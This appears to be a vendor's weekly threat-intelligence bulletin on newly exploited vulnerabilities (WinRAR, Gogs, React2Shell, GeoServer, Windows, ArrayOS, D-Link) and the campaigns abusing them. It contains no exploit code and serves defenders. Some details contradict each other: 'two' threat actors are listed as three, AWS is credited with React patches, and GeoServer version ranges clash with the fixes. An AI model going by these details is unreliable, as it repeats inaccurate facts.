Critical Surge in Threat Activity Hits Core and IoT Platforms

This week’s threat landscape saw significant activity across multiple vendors and platforms, marked by the addition of 6 new vulnerabilities to the CISA Known Exploited Vulnerabilities (KEV) catalog. These include a zero-day in Microsoft Windows under active exploitation, a flaw in Array Networks appliances, a critical Meta React Server vulnerability, a path traversal issue in RARLAB WinRAR, an Improper Restriction of XML External Entity Reference vulnerability in OSGeo GeoServer, and a three-year-old D-Link vulnerability affecting EoL devices. Active exploitation was also observed against Gogs self-hosted Git services, underscoring continued attacker interest in developer infrastructure.

Botnet operators such as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st intensified campaigns against exposed cloud environments, routers, and web applications, leveraging misconfigurations and outdated systems to expand their foothold.

Reports further indicate extensive exploitation of the WinRAR vulnerability by multiple threat actors, while the React2Shell flaw in React Server Components experienced a rapid surge in abuse following public disclosure and its recent inclusion in the CISA KEV.

Key points:

• 6 vulnerabilities added to the CISA KEV catalog, reflecting recent exploitation activity.
• Active exploitation observed in Gogs self-hosted Git service ‍
• Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.  
• Multiple threat actors abused React2Shell and WinRAR vulnerabilities ‍
• Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.

Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.

CVE-2025-6218 - Path Traversal Vulnerability in RARLAB WinRAR

A Path Traversal vulnerability in RARLAB WinRAR allows attackers to craft specially designed archive files that manipulate extraction paths and force WinRAR, RAR, UnRAR, or UnRAR.dll to place files outside the intended directory, potentially resulting in arbitrary code execution under the current user's context. The flaw arises from improper handling and validation of file paths within archive contents, enabling directory traversal sequences to be abused during extraction. This vulnerability affects WinRAR versions 7.11 and earlier, with a proof-of-concept available, raising the risk of exploitation. Although it has been patched in June 2025 with the release of version 7.12, it is now listed in the CISA KEV catalog.

CVE-2025-8110 - Symlink Path Traversal Vulnerability in the Gogs self-hosted Git service

A Symlink Path Traversal vulnerability in the Gogs self-hosted Git service enables remote code execution by allowing attackers to write files outside intended repository boundaries. Gogs, a lightweight Git platform written in Go and widely adopted for its simplicity and low resource footprint, is susceptible because CVE-2025-8110 effectively bypasses the earlier fix for CVE-2024-55947, reopening a path to RCE. Wiz researchers have confirmed that this vulnerability is actively exploited in the wild, with attackers creating rogue repositories to gain execution on exposed servers. No official patch has been released yet; therefore, immediate mitigations include disabling open user registration, isolating the service behind a VPN or IP allow-list, and checking for suspicious repositories particularly those with random eight-character names created around July 10th.

CVE-2025-55182 - Remote Code Execution Vulnerability in Meta React Server Components

A Pre-Authentication Remote Code Execution vulnerability in the react-server package, caused by insecure deserialization, allows attackers to achieve unauthenticated RCE across systems supporting React Server components. Dubbed React2Shell, this flaw enables arbitrary command execution even in applications that do not explicitly use server functions, posing a critical risk to modern web environments. The vulnerability affects multiple packages, including react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack, all widely integrated within the React ecosystem. AWS has released updated, patched versions to address this issue. This vulnerability has also been added to the CISA KEV catalog.

CVE-2025-58360 - Improper Restriction of XML External Entity Reference Vulnerability in OSGeo GeoServer

An Improper Restriction of XML External Entity Reference (XXE) vulnerability in OSGeo GeoServer allows attackers to supply crafted XML input via the /geoserver/wms GetMap operation, enabling the definition of external entities that can be abused to read arbitrary files from the server, conduct server-side request forgery (SSRF), or trigger denial-of-service conditions by exhausting system resources. The flaw affects GeoServer versions from 2.26.0 to before 2.26.2 and versions prior to 2.25.6, with security fixes delivered in GeoServer 2.25.6, 2.26.3, and 2.27.0 as part of the November patch release; despite remediation being available, the vulnerability has now been added to the CISA KEV catalog.

CVE-2025-62221 - Use-After-Free Vulnerability in Microsoft Windows

A Use-After-Free vulnerability in Microsoft Windows enables a local, authenticated attacker to perform privilege escalation, ultimately gaining SYSTEM-level access. The flaw resides in the Windows Cloud Files Mini Filter Driver, where improper memory handling allows an authorized user to elevate privileges. Microsoft confirmed that this vulnerability was exploited in the wild as a zero-day, though no technical exploitation details, threat actor information, or activity scope have been disclosed. The issue has been patched through a Microsoft security update and has been added to the CISA KEV catalog.

CVE-2025-66644 - OS Command Injection Vulnerability in Array Networks ArrayOS AG

An OS Command Injection vulnerability in Array Networks ArrayOS AG allows attackers to execute arbitrary commands on affected secure access gateway appliances, with all versions prior to 9.4.5.9 impacted. These SSL VPN-based AG series devices are widely used by large organizations for remote and distributed workforce access, making exploitation highly consequential. According to JPCERT/CC, the flaw has been actively exploited since at least August, with threat actors targeting Japanese organizations to deploy persistent backdoors, including PHP webshells dropped at /ca/aproxy/webapp/. The activity was further linked to the IP address 194.233.100[.]138, used for both initial compromise and command-and-control operations, indicating a coordinated campaign. The vulnerability was patched in ArrayOS 9.4.5.9 and has been added to the CISA KEV catalog.

CVE-2022-37055 - Buffer Overflow Vulnerability in D-Link Routers

A Buffer Overflow vulnerability in D-Link GO-RT-AC750 routers significantly impacts confidentiality, integrity, and availability, affecting versions GORTAC750_revA_v101b03 and GO-RT-AC750_revB_FWv200b02. The flaw resides in the router's web interface components (cgibin and hnap_main), where improper memory handling allows attackers to overwrite memory beyond allocated boundaries. This vulnerability is particularly dangerous as it can be exploited remotely without authentication, requires low attack complexity, and needs no user interaction, making Internet-facing devices highly exposed. D-Link confirmed the products are End of Life (EoL) and End of Service (EoS), leaving replacement as the recommended mitigation. The issue has been added to the CISA KEV catalog.

Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.

Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.

Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.

CVE-2025-6218

According to multiple reports from BI.ZONE, Foresiet, SecPod, and Synaptic Security, CVE-2025-6218 has been exploited by two distinct threat actors, including GOFFEE (also known as Paper Werewolf), Bitter (APT-C-08 or Manlinghua), and Gamaredon. Analysis published in August 2025 indicated that GOFFEE likely exploited CVE-2025-6218 in conjunction with CVE-2025-8088, another WinRAR path traversal flaw, during phishing attacks against organizations in Russia in July 2025. Further reporting showed that the South Asia focused Bitter APT weaponized the vulnerability to achieve persistence and deploy a C# trojan via a lightweight downloader delivered through a RAR archive titled "Provision of Information for Sectoral for AJK.rar," which contained a benign Word document paired with a malicious macro template. Additional intelligence confirmed that the Russian threat group Gamaredon leveraged CVE-2025-6218 in phishing campaigns targeting Ukrainian military, governmental, political, and administrative sectors, using the flaw of deliver the Pteranodon malware, with activity first observed in November 2025.

Mass Exploitation of React2Shell

A coordinated wave of exploitation targeting CVE-2025-55182 (React2Shell) emerged within hours of disclosure, with reports from Amazon Web Services (AWS) and Huntress attributing early activity to China-linked threat actors Earth Lamia and Jackpot Panda, who weaponized the React Server Components (RSC) vulnerability to achieve unauthenticated remote code execution. Observed intrusions involved the deployment of payloads such as the PeerBlight Linux backdoor, the CowTunnel reverse proxy tunnel, the ZinFoq Go-based post-exploitation implant, and the wocaosinm.sh Kaiji DDoS malware variant, alongside discovery commands, command-and-control retrieval attempts, exploitation of publicly available GitHub tools to identify vulnerable Next.js instances, and delivery of the XMRig cryptocurrency miner, with notable targeting of construction and entertainment sectors as of December 8, 2025. Subsequent analysis from Palo Alto Networks Unit 42 identified activity overlapping with the Contagious Interview campaign through the delivery of EtherRAT, BPFDoor, and Auto-Color.  

Additional intelligence from VulnCheck highlighted extensive exploitation attempts linked to the RondoDox botnet, aligning with global abuse patterns for React2Shell, while Unit 42 also confirmed more than 30 affected organizations and identified activity consistent with UNC5174 (CL-STA-1015) involving SNOWLIGHT, VShell, Cobalt Strike, interactive web shells, and various commodity malware families, including the cross-platform backdoor Noodle RAT (ANGRYREBEL/Nood RAT). Reporting from abuse.ch further revealed exploitation of the vulnerability leading to Mirai botnet infections, demonstrating the widespread and multifaceted abuse of this critical flaw across diverse threat ecosystems.

PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.

This week’s findings underscore the speed and scale at which attackers exploit newly disclosed and unpatched vulnerabilities, especially across outdated and exposed systems. The rapid abuse of React2Shell, WinRAR, and cloud-facing services highlights the growing need for continuous monitoring and actionable intelligence. As exploitation trends intensify, organizations must strengthen visibility and prioritize remediation based on real-world threat activity. Loginsoft Vulnerability Intelligence (LOVI) empowers teams with timely insights into exploited vulnerabilities and active campaigns, enabling faster, risk-driven defenses.

FAQs:

1) What is React2Shell and why is it appealing for threat actors? ‍

A: React2Shell refers to CVE-2025-55182, a critical RCE flaw in React Server Components that allows unauthenticated attackers to run arbitrary code on vulnerable servers. Its appeal lies in the zero-authentication attack surface, widespread adoption of React frameworks, and the ability to rapidly gain initial access for malware deployment, persistence, or botnet expansion.

2) What are EOL and EOS, and why do they matter for vulnerability and patch management?

A: EOL (End of Life) and EOS (End of Service) indicate that a product no longer receives updates, patches, or vendor support. Systems in EOL/EOS state become high-risk because newly discovered vulnerabilities remain unpatched, making them prime targets for exploitation.

3) What does “PoC available” mean, and why does it increase risk for a vulnerability?

A) “PoC available” means a working exploit for the vulnerability has been publicly released, proving it can be abused. This helps defenders test and validate fixes, but it also gives attackers a ready-made blueprint, often leading to rapid and widespread exploitation if systems remain unpatched.

4) Why do attackers continue to exploit older vulnerabilities even when patches exist?

A) Attackers frequently target outdated or unpatched systems because many organizations delay updates, run legacy equipment, or rely on unsupported software. These gaps create predictable entry points that threat actors can exploit with minimal effort, making old vulnerabilities just as dangerous as new ones.